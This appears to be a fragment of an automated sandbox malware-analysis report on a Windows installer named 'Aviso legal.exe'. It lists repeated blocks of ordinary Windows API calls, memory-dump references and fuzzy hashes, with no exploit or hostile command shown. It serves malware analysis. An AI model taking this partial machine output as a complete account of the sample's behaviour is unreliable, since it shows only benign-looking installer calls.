                                • Instruction Fuzzy Hash: 0B41C0B1008389DFD764AF25D848A2E7FF9FB94310F20491EF54A8A680E778B944DB71
                                APIs
                                • GetDC.USER32(?), ref: 00401E51
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                  • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                  • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nscAAC8.tmp\System.dll,00000000), ref: 00406779
                                • CreateFontIndirectW.GDI32(0040CDF0), ref: 00401ED3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                • String ID:
                                • API String ID: 2584051700-0
                                • Opcode ID: 0465d2832808ea9d6fff4b9245e4cab849096788d5b9b76ed02900a81bf07427
                                • Instruction ID: 78b13ae86a0973dc2b43aa2eb6c1af0beb3c1ef463c522f55250376beecb9f8a
                                • Opcode Fuzzy Hash: 0465d2832808ea9d6fff4b9245e4cab849096788d5b9b76ed02900a81bf07427
                                • Instruction Fuzzy Hash: 7001B571904241EFEB005BB0EE49B9A3FB4BB15301F108A39F541B71D2C7B904458BED
                                APIs
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,705B22D8,?,00000808), ref: 705B16D5
                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,705B22D8,?,00000808), ref: 705B16DC
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,705B22D8,?,00000808), ref: 705B16F0
                                • GetProcAddress.KERNEL32(705B22D8,00000000), ref: 705B16F7
                                • GlobalFree.KERNEL32(00000000), ref: 705B1700
                                Memory Dump Source
                                • Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true
                                • Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd
                                Similarity
                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                • String ID:
                                • API String ID: 1148316912-0
                                • Opcode ID: e947b8310b2e5a055856f76cb6c0458782d1fca6078b387b8d4b364c637e29b3
                                • Instruction ID: 472fc74ce7a5424157759d6192137e64caa3473886b3b0a890359f1fe8361922
                                • Opcode Fuzzy Hash: e947b8310b2e5a055856f76cb6c0458782d1fca6078b387b8d4b364c637e29b3
                                • Instruction Fuzzy Hash: 62F0FE731061387B963026A78C4CD9B7E9CDF9B2F5B210311F718911A086615C019BF1
                                APIs
                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: MessageSend$Timeout
                                • String ID: !
                                • API String ID: 1777923405-2657877971
                                • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                APIs
                                • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                • wsprintfW.USER32 ref: 00404DF0
                                • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: ItemTextlstrlenwsprintf
                                • String ID: %u.%u%s%s
                                • API String ID: 3540041739-3551169577
                                • Opcode ID: 06d0c97e576fd12928d3ccf504f16285b7ed678bb4ff82b9d12c133dfbf75c1e
                                • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                • Opcode Fuzzy Hash: 06d0c97e576fd12928d3ccf504f16285b7ed678bb4ff82b9d12c133dfbf75c1e
                                • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                APIs
                                • CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,?,00405F2B,C:\Users\user\AppData\Local\Temp\nstAE84.tmp,C:\Users\user\AppData\Local\Temp\nstAE84.tmp, 4u,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75E03420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                                • CharNextW.USER32(00000000), ref: 00405ECA
                                • CharNextW.USER32(00000000), ref: 00405EE2
                                Strings
                                • C:\Users\user\AppData\Local\Temp\nstAE84.tmp, xrefs: 00405EB8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CharNext
                                • String ID: C:\Users\user\AppData\Local\Temp\nstAE84.tmp
                                • API String ID: 3213498283-2550375725
                                • Opcode ID: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                • Instruction ID: b7f7aa27055ddc775a1b47344aef2f77b81fec2ea34db2f3ccdabfa21b6bce3d
                                • Opcode Fuzzy Hash: 389604e099afbb0f1c733809242fd9884b65eb47018f1a61235cb76474637dc7
                                • Instruction Fuzzy Hash: 7BF0F631810E1296DB317B548C44E7B97BCEB64354B04843BD741B71C0D3BC8D808BDA
                                APIs
                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CharPrevlstrcatlstrlen
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 2659869361-3355392842
                                • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                APIs
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 705B1171
                                • GlobalAlloc.KERNEL32(00000040,?), ref: 705B11E3
                                • GlobalFree.KERNEL32 ref: 705B124A
                                • GlobalFree.KERNEL32(?), ref: 705B129B
                                • GlobalFree.KERNEL32(00000000), ref: 705B12B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.1427938394.00000000705B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 705B0000, based on PE: true
                                • Associated: 00000000.00000002.1427870963.00000000705B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1427971257.00000000705B4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                • Associated: 00000000.00000002.1428000657.00000000705B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_705b0000_Aviso legal.jbxd
                                Similarity
                                • API ID: Global$Free$Alloc
                                • String ID:
                                • API String ID: 1780285237-0
                                • Opcode ID: 85f0cf5a272f08d66dfac1dbd2810e1ad1a01379959bc4da072236e0a5ab2fd4
                                • Instruction ID: 7e8ad353792fa1a01277a2f4406fe279212e8caeab5a82998ce0077b1761d32e
                                • Opcode Fuzzy Hash: 85f0cf5a272f08d66dfac1dbd2810e1ad1a01379959bc4da072236e0a5ab2fd4
                                • Instruction Fuzzy Hash: 10518076500209DFD785EF6AC94DB19BBFAEB54315BA0461AF906DB320E738BD00CB58
                                APIs
                                • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                • GetTickCount.KERNEL32 ref: 0040304A
                                • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                • String ID:
                                • API String ID: 2102729457-0
                                • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                APIs
                                • IsWindowVisible.USER32(?), ref: 00405542
                                • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Window$CallMessageProcSendVisible
                                • String ID:
                                • API String ID: 3748168415-3916222277
                                • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                APIs
                                • FreeLibrary.KERNEL32(?,75E03420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                • GlobalFree.KERNEL32(?), ref: 00403B78
                                Strings
                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: Free$GlobalLibrary
                                • String ID: C:\Users\user\AppData\Local\Temp\
                                • API String ID: 1100898210-3355392842
                                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                APIs
                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Aviso legal.exe,C:\Users\user\Desktop\Aviso legal.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Aviso legal.exe,C:\Users\user\Desktop\Aviso legal.exe,80000000,00000003), ref: 00405E6E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1404090581.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1404062758.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404144684.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404182731.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000492000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.0000000000497000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1404496027.000000000049D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_Aviso legal.jbxd
                                Similarity
                                • API ID: CharPrevlstrlen
                                • String ID: C:\Users\user\Desktop
                                • API String ID: 2709904686-3370423016
